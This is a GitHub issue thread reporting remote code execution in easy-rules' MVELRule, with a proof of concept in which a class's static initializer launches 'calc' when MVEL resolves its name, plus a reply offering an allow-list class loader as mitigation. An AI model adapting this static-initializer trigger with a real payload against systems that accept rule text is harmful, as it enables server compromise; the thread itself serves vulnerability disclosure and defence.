j-easy / easy-rules

The simple, stupid rules engine for Java
https://github.com/j-easy/easy-rules/wiki
MIT License

MVELRule Remote Code Execution #419

Open sirnple opened 7 months ago

sirnple commented 7 months ago

easy-rules-mvel version: 4.1.0

I have run code like:

import org.jeasy.rules.mvel.MVELRule;

// Compiling the "then" action from a string makes MVEL resolve the class name in the expression.
try {
    MVELRule mVELRule = new MVELRule();
    MVELRule result = mVELRule.then("jaz.Zer");
} catch (Exception e) {
    // Swallowed on purpose: the class has already been loaded by the time anything is thrown.
}

Meanwhile I have the class jaz.Zer on the classpath, with the following content:

package jaz;

import java.io.IOException;

public class Zer {
    // Runs as soon as the class is initialized, i.e. when MVEL resolves "jaz.Zer".
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}

On the Windows platform, the above code will open my PC's calculator.

Additional: MVELRule.when also leads to this RCE

import org.jeasy.rules.mvel.MVELRule;

// The same class resolution happens when the condition is compiled.
try {
    MVELRule mVELRule = new MVELRule();
    MVELRule result = mVELRule.when("\bjaz.Zer");
} catch (Exception e) {
    // Swallowed on purpose: the class has already been loaded by the time anything is thrown.
}

dvgaba commented 5 months ago
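The root problem in the report above is that MVEL resolves any fully qualified class name that appears in rule text, so rule strings must be treated as code and never accepted from untrusted sources. As an added defense-in-depth example (not the reporter's code and not part of easy-rules or MVEL), the following shows how an allow-list class loader can be handed to MVEL through its ParserConfiguration so that names outside the list, such as jaz.Zer, cannot be loaded from an expression. It assumes MVEL 2.x (org.mvel2.ParserConfiguration.setClassLoader and org.mvel2.ParserContext(ParserConfiguration) are real MVEL API) and that the easy-rules-mvel version in use offers the MVELRule(ParserContext) constructor, which is an assumption of this example; RestrictedMvelRuleExample and AllowListClassLoader are hypothetical names.

```java
// Added example, not code from the issue or the easy-rules project.
// Assumes MVEL 2.x and an easy-rules-mvel version with MVELRule(ParserContext).
import java.util.Set;

import org.jeasy.rules.mvel.MVELRule;
import org.mvel2.ParserConfiguration;
import org.mvel2.ParserContext;

public class RestrictedMvelRuleExample {

    /**
     * Class loader that resolves only an explicit allow-list of class names.
     * Every other name fails with ClassNotFoundException, so an expression
     * such as "jaz.Zer" cannot cause that class's static initializer to run.
     * Overriding loadClass(String, boolean) covers both loadClass(String)
     * and Class.forName(name, true, loader).
     */
    static final class AllowListClassLoader extends ClassLoader {
        private final Set<String> allowed;

        AllowListClassLoader(ClassLoader parent, Set<String> allowed) {
            super(parent);
            this.allowed = allowed;
        }

        @Override
        protected Class<?> loadClass(String name, boolean resolve) throws ClassNotFoundException {
            if (!allowed.contains(name)) {
                throw new ClassNotFoundException("class not permitted in rule expressions: " + name);
            }
            return super.loadClass(name, resolve);
        }
    }

    public static void main(String[] args) {
        // Only the types rules legitimately need; everything else is unresolvable.
        Set<String> allowed = Set.of("java.lang.String", "java.lang.Integer", "java.lang.Boolean");

        ParserConfiguration config = new ParserConfiguration();
        config.setClassLoader(new AllowListClassLoader(
                RestrictedMvelRuleExample.class.getClassLoader(), allowed));
        ParserContext parserContext = new ParserContext(config);

        // Assumption: MVELRule(ParserContext) is available in the easy-rules-mvel version in use.
        MVELRule rule = new MVELRule(parserContext);

        // The reporter's payload, standing in for any attacker-controlled rule text.
        String untrusted = "jaz.Zer";
        try {
            rule.then(untrusted);
            // MVEL may keep an unresolvable name as a plain variable reference; either way the
            // allow-list loader has refused to load jaz.Zer, so its static block never runs.
            System.out.println("compiled without resolving jaz.Zer as a class");
        } catch (Exception e) {
            System.out.println("rejected: " + e);
        }
    }
}
```

The loader restriction only narrows what an expression can reach; it does not make untrusted rule text safe, since MVEL still executes whatever the allowed types expose. The primary control remains sourcing rule definitions exclusively from trusted configuration.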

It's a limitation of mvel expression language.

LuisMedinaG commented 4 months ago

Hi! Do you have an update on this? Is there a workaround or fix for this? I see the vulnerability is still open.

dmuley17 commented 3 months ago

Do we have any workaround to fix the vulnerability?